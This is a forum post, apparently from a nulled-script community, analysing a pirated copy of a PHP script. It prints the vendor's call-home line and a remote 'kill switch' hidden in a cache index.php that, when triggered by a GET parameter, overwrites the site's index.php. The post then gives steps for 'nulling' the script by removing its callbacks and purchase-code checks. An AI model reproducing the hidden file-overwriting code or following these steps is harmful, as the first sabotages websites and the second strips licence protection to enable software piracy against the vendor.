The v1.3 above is showing to be marked by "JoJoThemes" and could be stained,
haven't verified yet if it's clear or not. (Virus Total Sucks, Don't rely on that)
/script/admin/controllers/dashboard.php (Line 193)
Has a call back
Code:
$latestData = getMyData("http://api.prothemes.biz/tools/latest_news.php?domain=$domain&code=$item_purchase_code");
As does several other files... /script/core/helpers/site_snapshot_helper.php...
So, I am declaring the above version to be not nulled.
Not to mention the dashboard is showing version 1.0
Update: 02/04/16: Unlicensed Fake Users Detection (controllable by developer) where he will shut off the script.
Look at the bottom of file: script/core/models/_tcpdf_5.0.002/cache/index.php (LOL) Well Hidden, Dev, Well Hidden.
It looks to me like when the script calls home to check for updates, it executes that below code, which erases the index and replaces it with a "Fake Copy" notice.
It also looks like the developer can track the detected fake sites... It may also take a snapshot of your site. So be careful.
Here is the kill switch code:
Code:
//Unlicensed Fake Users
if(isset($_GET['fake'])){
function doAction(){
$data = '<?php
echo \'<div style="text-align: center;"><br /><br /><h1 style="color: red;" >Fake Copy of Script!</h1>
<div><a href="http://codecanyon.net/">Purcahse License Now</a></div></div>\';
die();
?>';
file_put_contents('../../../../index.php',$data);
return true;
}
require_once('../../../../config.php');
if(isset($_GET['itemCode'])){
$itemCode = Trim(htmlspecialchars($_GET['itemCode']));
if($itemCode == $item_purchase_code){
doAction();
}
}
if(isset($_GET['authCode'])){
$userAuthCode = Trim(htmlspecialchars($_GET['authCode']));
if($authCode == $userAuthCode){
doAction();
}
}
die();
}
DO NOT USE THIS UNLESS YOU NULL IT.
Nulling it is easy. Simply skim the script, remove all of the update requests and callbacks, remove the above code.
Look for strings like: "$item_purchase_code" and disable them or remove them.
In my opinion, it's worth purchasing... it's cheap! So go buy it.